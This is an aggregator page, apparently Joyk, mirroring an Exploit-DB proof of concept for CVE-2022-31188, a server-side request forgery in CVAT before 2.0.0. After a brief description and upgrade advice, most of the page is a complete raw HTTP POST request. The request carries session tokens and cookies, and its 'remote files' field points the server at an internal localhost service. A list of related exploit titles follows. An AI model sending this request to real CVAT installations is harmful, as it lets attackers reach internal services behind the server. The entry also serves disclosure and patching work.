[webapps] CVAT 2.0 - Server Side Request Forgery
source link: https://www.exploit-db.com/exploits/51030
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
CVAT 2.0 - Server Side Request Forgery
#Exploit Title: CVAT 2.0 - SSRF (Server Side Request Forgery)
#Exploit Author: Emir Polat
#Vendor Homepage: https://github.com/opencv/cvat
#Version: < 2.0.0
#Tested On: Version 1.7.0 - Ubuntu 20.04.4 LTS (GNU/Linux 5.4.0-122-generic x86_64)
#CVE: CVE-2022-31188
# Description:
#CVAT is an opensource interactive video and image annotation tool for computer vision. Versions prior to 2.0.0 were found to be subject to a Server-side request forgery (SSRF) vulnerability.
#Validation has been added to urls used in the affected code path in version 2.0.0. Users are advised to upgrade.
POST /api/v1/tasks/2/data HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:97.0) Gecko/20100101 Firefox/97.0
Accept: application/json, text/plain, */*
Accept-Language:en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Authorization: Token 06d88f739a10c7533991d8010761df721b790b7
X-CSRFTOKEN:65s9UwX36e9v8FyiJi0KEzgMigJ5pusEK7dU4KSqgCajSBAYQxKDYCOEVBUhnIGV
Content-Type: multipart/form-data; boundary=-----------------------------251652214142138553464236533436
Content-Length: 569
Origin: http://localhost:8080
Connection: close
Referer:http://localhost:8080/tasks/create
Cookie: csrftoken=65s9UwX36e9v8FyiJi0KEzgMigJ5pusEK7dU4KSqgCajSBAYQxKDYCOEVBUhnIGv; sessionid=dzks19fhlfan8fgq0j8j5toyrh49dned
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
-----------------------------251652214142138553464236533436
Content-Disposition: form-data; name="remote files[0]"
http://localhost:8081
-----------------------------251652214142138553464236533436
Content-Disposition: form-data; name=" image quality"
170
-----------------------------251652214142138553464236533436
Content-Disposition: form-data; name="use zip chunks"
true
-----------------------------251652214142138553464236533436
Content-Disposition: form-data; name="use cache"
true
-----------------------------251652214142138553464236533436--
Recommend
-
7
Server-side request forgery (SSRF), explained Web applications have become one of the most important assets for companies of all sizes. And due to this, they have also become a target. Web applications are getting more co...
-
3
wkhtmltopdf 0.12.6 - Server Side Request Forgery ...
-
3
Label Studio 1.5.0 - Authenticated Server Side Request Forgery (SSRF)...
-
6
X-Skipper-Proxy v0.13.237 - Server Side Request Forgery (SSRF)...
-
10
Sielco Analog FM Transmitter 2.12 - Cross-Site Request Forgery...
-
7
News Analysis Azure API Management flaws highlight server-side request forgery risks in API development
-
3
Camaleon CMS v2.7.0 - Server-Side Template Injection (SSTI)
-
4
Pydio Cells 4.1.2 - Server-Side Request Forgery ...
-
10
Online Examination System Project 1.0 - Cross-site request forgery (CSRF)...
-
9
Request-Baskets v1.2.1 - Server-side request forgery (SSRF)
About Joyk
Aggregate valuable and interesting links.
Joyk means Joy of geeK